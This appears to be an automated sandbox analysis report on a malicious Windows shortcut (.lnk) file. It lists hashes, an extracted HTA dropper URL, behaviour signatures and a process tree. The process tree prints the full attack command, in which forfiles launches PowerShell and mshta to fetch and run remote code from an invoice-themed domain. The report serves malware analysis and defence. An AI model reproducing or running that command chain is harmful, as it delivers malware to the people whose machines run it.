Overview

overview

10

Static

static

1

84297536d9...30.lnk

windows7-x64

10

84297536d9...30.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    17-05-2024 12:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk

  • Size

    148KB

  • MD5

    d39a73de9f109e3dba408e9481998206

  • SHA1

    30651dada81443db0fde9c3a336955d27b6d9024

  • SHA256

    84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30

  • SHA512

    09c8954ecabbeb36aeb8804858168eb1448f5894c1641a1ba5311f2b33aaeb24814734d0b1f7e777f22910c53bb9df500801907a603d8d71fba139705f444d61

  • SSDEEP

    24:8WEe6Dz358m+pyAWkr+/4x+sPxZvBG0qdd79ds/Z6U/ab9Q9qFBm:8WENDzKvZbnvBG7dJ9A6U/a5QW

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice

Signatures

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1652
    • C:\Windows\System32\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2672
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        . mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice
        3⤵
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2532
        • C:\Windows\system32\mshta.exe
          "C:\Windows\system32\mshta.exe" https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice
          4⤵
          • Modifies Internet Explorer settings
          PID:2720

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2532-40-0x000007FEF5EEE000-0x000007FEF5EEF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2532-41-0x000000001B750000-0x000000001BA32000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2532-42-0x00000000027A0000-0x00000000027A8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2532-43-0x000007FEF5C30000-0x000007FEF65CD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2532-44-0x000007FEF5C30000-0x000007FEF65CD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2532-45-0x000007FEF5C30000-0x000007FEF65CD000-memory.dmp

    Filesize

    9.6MB

    Download